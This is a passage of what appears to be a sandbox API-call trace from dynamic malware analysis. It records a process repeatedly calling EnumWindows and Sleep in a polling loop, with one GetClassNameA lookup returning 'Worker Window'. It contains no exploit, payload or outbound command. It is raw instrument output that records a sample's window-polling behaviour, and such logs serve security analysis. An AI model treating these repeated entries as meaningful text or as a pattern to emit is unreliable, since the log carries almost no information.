(dwMilliseconds=0x64) [0293.524] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.527] Sleep (dwMilliseconds=0x64) [0293.583] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.585] Sleep (dwMilliseconds=0x64) [0293.588] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.590] Sleep (dwMilliseconds=0x64) [0293.625] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.627] Sleep (dwMilliseconds=0x64) [0293.695] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.698] Sleep (dwMilliseconds=0x64) [0293.705] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.707] Sleep (dwMilliseconds=0x64) [0293.749] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.751] Sleep (dwMilliseconds=0x64) [0293.794] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.796] Sleep (dwMilliseconds=0x64) [0293.805] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.806] Sleep (dwMilliseconds=0x64) [0293.835] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.837] Sleep (dwMilliseconds=0x64) [0293.873] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.875] Sleep (dwMilliseconds=0x64) [0293.896] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.898] Sleep (dwMilliseconds=0x64) [0293.914] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.916] Sleep (dwMilliseconds=0x64) [0293.951] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.953] Sleep (dwMilliseconds=0x64) [0293.975] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.977] Sleep (dwMilliseconds=0x64) [0293.994] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.996] Sleep (dwMilliseconds=0x64) [0294.035] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.037] Sleep (dwMilliseconds=0x64) [0294.069] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.071] Sleep (dwMilliseconds=0x64) [0294.077] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.078] Sleep (dwMilliseconds=0x64) [0294.115] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.117] Sleep (dwMilliseconds=0x64) [0294.156] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.158] Sleep (dwMilliseconds=0x64) [0294.170] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.172] Sleep (dwMilliseconds=0x64) [0294.209] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.212] Sleep (dwMilliseconds=0x64) [0294.248] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.250] Sleep (dwMilliseconds=0x64) [0294.254] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.255] Sleep (dwMilliseconds=0x64) [0294.292] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.342] Sleep (dwMilliseconds=0x64) [0294.348] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.350] Sleep (dwMilliseconds=0x64) [0294.383] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.385] Sleep (dwMilliseconds=0x64) [0294.422] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.424] Sleep (dwMilliseconds=0x64) [0294.429] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.430] Sleep (dwMilliseconds=0x64) [0294.478] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.484] Sleep (dwMilliseconds=0x64) [0294.529] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.531] Sleep (dwMilliseconds=0x64) [0294.538] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.539] Sleep (dwMilliseconds=0x64) [0294.610] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.611] Sleep (dwMilliseconds=0x64) [0294.648] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.650] Sleep (dwMilliseconds=0x64) [0294.658] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.659] Sleep (dwMilliseconds=0x64) [0294.690] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.692] Sleep (dwMilliseconds=0x64) [0294.729] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.731] Sleep (dwMilliseconds=0x64) [0294.735] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.750] Sleep (dwMilliseconds=0x64) [0294.824] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.826] Sleep (dwMilliseconds=0x64) [0294.863] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.865] Sleep (dwMilliseconds=0x64) [0294.873] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.904] Sleep (dwMilliseconds=0x64) [0294.940] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.942] Sleep (dwMilliseconds=0x64) [0294.953] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.954] Sleep (dwMilliseconds=0x64) [0294.980] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0294.982] Sleep (dwMilliseconds=0x64) [0295.017] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.019] Sleep (dwMilliseconds=0x64) [0295.024] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.026] Sleep (dwMilliseconds=0x64) [0295.060] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.062] Sleep (dwMilliseconds=0x64) [0295.100] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.101] Sleep (dwMilliseconds=0x64) [0295.102] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.103] Sleep (dwMilliseconds=0x64) [0295.140] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.142] Sleep (dwMilliseconds=0x64) [0295.167] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.170] Sleep (dwMilliseconds=0x64) [0295.183] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.185] Sleep (dwMilliseconds=0x64) [0295.221] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.223] Sleep (dwMilliseconds=0x64) [0295.251] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.252] Sleep (dwMilliseconds=0x64) [0295.262] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.264] Sleep (dwMilliseconds=0x64) [0295.300] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.304] Sleep (dwMilliseconds=0x64) [0295.342] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.344] Sleep (dwMilliseconds=0x64) [0295.357] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.359] Sleep (dwMilliseconds=0x64) [0295.416] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.417] Sleep (dwMilliseconds=0x64) [0295.437] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.439] Sleep (dwMilliseconds=0x64) [0295.497] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.498] Sleep (dwMilliseconds=0x64) [0295.519] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.520] Sleep (dwMilliseconds=0x64) [0295.538] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.540] Sleep (dwMilliseconds=0x64) [0295.601] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.603] Sleep (dwMilliseconds=0x64) [0295.625] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.627] Sleep (dwMilliseconds=0x64) [0295.646] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.648] Sleep (dwMilliseconds=0x64) [0295.686] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.688] Sleep (dwMilliseconds=0x64) [0295.713] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.715] Sleep (dwMilliseconds=0x64) [0295.728] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.730] Sleep (dwMilliseconds=0x64) [0295.774] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.777] Sleep (dwMilliseconds=0x64) [0295.815] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.817] Sleep (dwMilliseconds=0x64) [0295.821] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.822] Sleep (dwMilliseconds=0x64) [0295.860] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.862] Sleep (dwMilliseconds=0x64) [0295.901] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.903] Sleep (dwMilliseconds=0x64) [0295.914] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0295.916] Sleep (dwMilliseconds=0x64) [0296.090] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.092] Sleep (dwMilliseconds=0x64) [0296.108] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.109] Sleep (dwMilliseconds=0x64) [0296.132] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.134] Sleep (dwMilliseconds=0x64) [0296.171] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.173] Sleep (dwMilliseconds=0x64) [0296.203] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.206] Sleep (dwMilliseconds=0x64) [0296.220] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.222] Sleep (dwMilliseconds=0x64) [0296.258] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.262] Sleep (dwMilliseconds=0x64) [0296.299] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.301] Sleep (dwMilliseconds=0x64) [0296.318] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.320] Sleep (dwMilliseconds=0x64) [0296.356] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.358] Sleep (dwMilliseconds=0x64) [0296.404] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.407] Sleep (dwMilliseconds=0x64) [0296.435] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.437] Sleep (dwMilliseconds=0x64) [0296.463] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.465] Sleep (dwMilliseconds=0x64) [0296.510] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.514] Sleep (dwMilliseconds=0x64) [0296.525] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.526] Sleep (dwMilliseconds=0x64) [0296.583] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.585] Sleep (dwMilliseconds=0x64) [0296.623] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.625] Sleep (dwMilliseconds=0x64) [0296.646] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.648] Sleep (dwMilliseconds=0x64) [0296.665] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.667] Sleep (dwMilliseconds=0x64) [0296.702] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.704] Sleep (dwMilliseconds=0x64) [0296.720] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.721] Sleep (dwMilliseconds=0x64) [0296.742] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.745] Sleep (dwMilliseconds=0x64) [0296.855] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.857] Sleep (dwMilliseconds=0x64) [0296.917] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.919] Sleep (dwMilliseconds=0x64) [0296.970] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0296.973] Sleep (dwMilliseconds=0x64) [0297.038] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.040] Sleep (dwMilliseconds=0x64) [0297.060] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.061] Sleep (dwMilliseconds=0x64) [0297.079] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.082] Sleep (dwMilliseconds=0x64) [0297.118] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.120] Sleep (dwMilliseconds=0x64) [0297.129] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.131] Sleep (dwMilliseconds=0x64) [0297.194] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.195] Sleep (dwMilliseconds=0x64) [0297.240] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.241] Sleep (dwMilliseconds=0x64) [0297.271] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.273] Sleep (dwMilliseconds=0x64) [0297.320] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.322] Sleep (dwMilliseconds=0x64) [0297.328] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.329] Sleep (dwMilliseconds=0x64) [0297.361] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.363] Sleep (dwMilliseconds=0x64) [0297.398] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.400] Sleep (dwMilliseconds=0x64) [0297.403] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.405] Sleep (dwMilliseconds=0x64) [0297.441] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.443] Sleep (dwMilliseconds=0x64) [0297.481] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.482] Sleep (dwMilliseconds=0x64) [0297.484] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.486] Sleep (dwMilliseconds=0x64) [0297.522] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.524] Sleep (dwMilliseconds=0x64) [0297.585] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.587] Sleep (dwMilliseconds=0x64) [0297.588] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.589] Sleep (dwMilliseconds=0x64) [0297.625] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.627] Sleep (dwMilliseconds=0x64) [0297.652] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.653] Sleep (dwMilliseconds=0x64) [0297.666] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.668] Sleep (dwMilliseconds=0x64) [0297.703] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.705] Sleep (dwMilliseconds=0x64) [0297.720] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.721] Sleep (dwMilliseconds=0x64) [0297.747] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.749] Sleep (dwMilliseconds=0x64) [0297.819] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.820] Sleep (dwMilliseconds=0x64) [0297.851] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.853] Sleep (dwMilliseconds=0x64) [0297.892] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.894] Sleep (dwMilliseconds=0x64) [0297.907] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.908] Sleep (dwMilliseconds=0x64) [0297.933] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.935] Sleep (dwMilliseconds=0x64) [0297.972] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0297.974] Sleep (dwMilliseconds=0x64) [0298.000] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.002] Sleep (dwMilliseconds=0x64) [0298.015] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.017] Sleep (dwMilliseconds=0x64) [0298.053] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.054] Sleep (dwMilliseconds=0x64) [0298.071] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.072] Sleep (dwMilliseconds=0x64) [0298.092] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.094] Sleep (dwMilliseconds=0x64) [0298.129] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.131] Sleep (dwMilliseconds=0x64) [0298.147] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.149] Sleep (dwMilliseconds=0x64) [0298.172] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.174] Sleep (dwMilliseconds=0x64) [0298.210] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.212] Sleep (dwMilliseconds=0x64) [0298.221] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.222] Sleep (dwMilliseconds=0x64) [0298.251] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.253] Sleep (dwMilliseconds=0x64) [0298.290] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.319] Sleep (dwMilliseconds=0x64) [0298.344] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.346] Sleep (dwMilliseconds=0x64) [0298.395] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.404] Sleep (dwMilliseconds=0x64) [0298.477] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.479] Sleep (dwMilliseconds=0x64) [0298.522] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.523] Sleep (dwMilliseconds=0x64) [0298.599] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.600] Sleep (dwMilliseconds=0x64) [0298.615] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.616] Sleep (dwMilliseconds=0x64) [0298.636] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.638] Sleep (dwMilliseconds=0x64) [0298.673] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.674] Sleep (dwMilliseconds=0x64) [0298.679] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.680] Sleep (dwMilliseconds=0x64) [0298.715] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.717] Sleep (dwMilliseconds=0x64) [0298.744] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.745] Sleep (dwMilliseconds=0x64) [0298.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.755] Sleep (dwMilliseconds=0x64) [0298.801] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.804] Sleep (dwMilliseconds=0x64) [0298.825] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.826] Sleep (dwMilliseconds=0x64) [0298.845] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.847] Sleep (dwMilliseconds=0x64) [0298.883] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.885] Sleep (dwMilliseconds=0x64) [0298.897] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.924] Sleep (dwMilliseconds=0x64) [0298.964] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.965] Sleep (dwMilliseconds=0x64) [0298.976] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0298.978] Sleep (dwMilliseconds=0x64) [0299.006] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.008] Sleep (dwMilliseconds=0x64) [0299.046] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.047] Sleep (dwMilliseconds=0x64) [0299.055] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.057] Sleep (dwMilliseconds=0x64) [0299.087] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.089] Sleep (dwMilliseconds=0x64) [0299.125] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.127] Sleep (dwMilliseconds=0x64) [0299.140] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.142] Sleep (dwMilliseconds=0x64) [0299.170] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.173] Sleep (dwMilliseconds=0x64) [0299.211] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.213] Sleep (dwMilliseconds=0x64) [0299.234] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.237] Sleep (dwMilliseconds=0x64) [0299.253] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.255] Sleep (dwMilliseconds=0x64) [0299.291] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.293] Sleep (dwMilliseconds=0x64) [0299.332] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.334] Sleep (dwMilliseconds=0x64) [0299.346] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.348] Sleep (dwMilliseconds=0x64) [0299.385] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.420] Sleep (dwMilliseconds=0x64) [0299.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.428] Sleep (dwMilliseconds=0x64) [0299.463] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.464] Sleep (dwMilliseconds=0x64) [0299.484] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.486] Sleep (dwMilliseconds=0x64) [0299.502] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.504] Sleep (dwMilliseconds=0x64) [0299.540] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.542] Sleep (dwMilliseconds=0x64) [0299.569] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.570] Sleep (dwMilliseconds=0x64) [0299.597] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.598] Sleep (dwMilliseconds=0x64) [0299.634] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.636] Sleep (dwMilliseconds=0x64) [0299.640] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.642] Sleep (dwMilliseconds=0x64) [0299.677] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.678] Sleep (dwMilliseconds=0x64) [0299.703] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.704] Sleep (dwMilliseconds=0x64) [0299.718] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.719] Sleep (dwMilliseconds=0x64) [0299.755] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.757] Sleep (dwMilliseconds=0x64) [0299.797] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.798] Sleep (dwMilliseconds=0x64) [0299.824] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.826] Sleep (dwMilliseconds=0x64) [0299.870] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.872] Sleep (dwMilliseconds=0x64) [0299.888] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.889] Sleep (dwMilliseconds=0x64) [0299.912] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.914] Sleep (dwMilliseconds=0x64) [0299.949] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.966] GetClassNameA (in: hWnd=0x100de, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0299.967] Sleep (dwMilliseconds=0x64) [0299.996] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0299.997] Sleep (dwMilliseconds=0x64) [0300.033] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.036] Sleep (dwMilliseconds=0x64) [0300.039] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.040] Sleep (dwMilliseconds=0x64) [0300.076] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.080] Sleep (dwMilliseconds=0x64) [0300.110] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.111] Sleep (dwMilliseconds=0x64) [0300.118] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.120] Sleep (dwMilliseconds=0x64) [0300.157] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.159] Sleep (dwMilliseconds=0x64) [0300.192] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.194] Sleep (dwMilliseconds=0x64) [0300.199] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.201] Sleep (dwMilliseconds=0x64) [0300.245] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.247] Sleep (dwMilliseconds=0x64) [0300.284] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.286] Sleep (dwMilliseconds=0x64) [0300.288] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.290] Sleep (dwMilliseconds=0x64) [0300.338] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.341] Sleep (dwMilliseconds=0x64) [0300.381] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.384] Sleep (dwMilliseconds=0x64) [0300.399] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.401] Sleep (dwMilliseconds=0x64) [0300.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.465] Sleep (dwMilliseconds=0x64) [0300.488] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.489] Sleep (dwMilliseconds=0x64) [0300.512] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.514] Sleep (dwMilliseconds=0x64) [0300.560] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.563] Sleep (dwMilliseconds=0x64) [0300.625] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.627] Sleep (dwMilliseconds=0x64) [0300.632] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.634] Sleep (dwMilliseconds=0x64) [0300.665] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.667] Sleep (dwMilliseconds=0x64) [0300.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.709] Sleep (dwMilliseconds=0x64) [0300.724] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.725] Sleep (dwMilliseconds=0x64) [0300.750] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.752] Sleep (dwMilliseconds=0x64) [0300.902] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.904] Sleep (dwMilliseconds=0x64) [0300.958] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.960] Sleep (dwMilliseconds=0x64) [0300.996] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0300.998] Sleep (dwMilliseconds=0x64) [0301.035] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.036] Sleep (dwMilliseconds=0x64) [0301.041] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.042] Sleep (dwMilliseconds=0x64) [0301.075] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.077] Sleep (dwMilliseconds=0x64) [0301.104] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.105] Sleep (dwMilliseconds=0x64) [0301.115] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.116] Sleep (dwMilliseconds=0x64) [0301.151] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.169] Sleep (dwMilliseconds=0x64) [0301.193] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.195] Sleep (dwMilliseconds=0x64) [0301.239] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.241] Sleep (dwMilliseconds=0x64) [0301.248] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.251] Sleep (dwMilliseconds=0x64) [0301.280] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.282] Sleep (dwMilliseconds=0x64) [0301.327] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.329] Sleep (dwMilliseconds=0x64) [0301.338] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.342] Sleep (dwMilliseconds=0x64) [0301.372] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.374] Sleep (dwMilliseconds=0x64) [0301.407] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.408] Sleep (dwMilliseconds=0x64) [0301.414] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.415] Sleep (dwMilliseconds=0x64) [0301.452] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0301.456] Sleep (dwMilliseconds=0x64) [0301.478] EnumWindows (lpEnumFunc=0x423dd0, 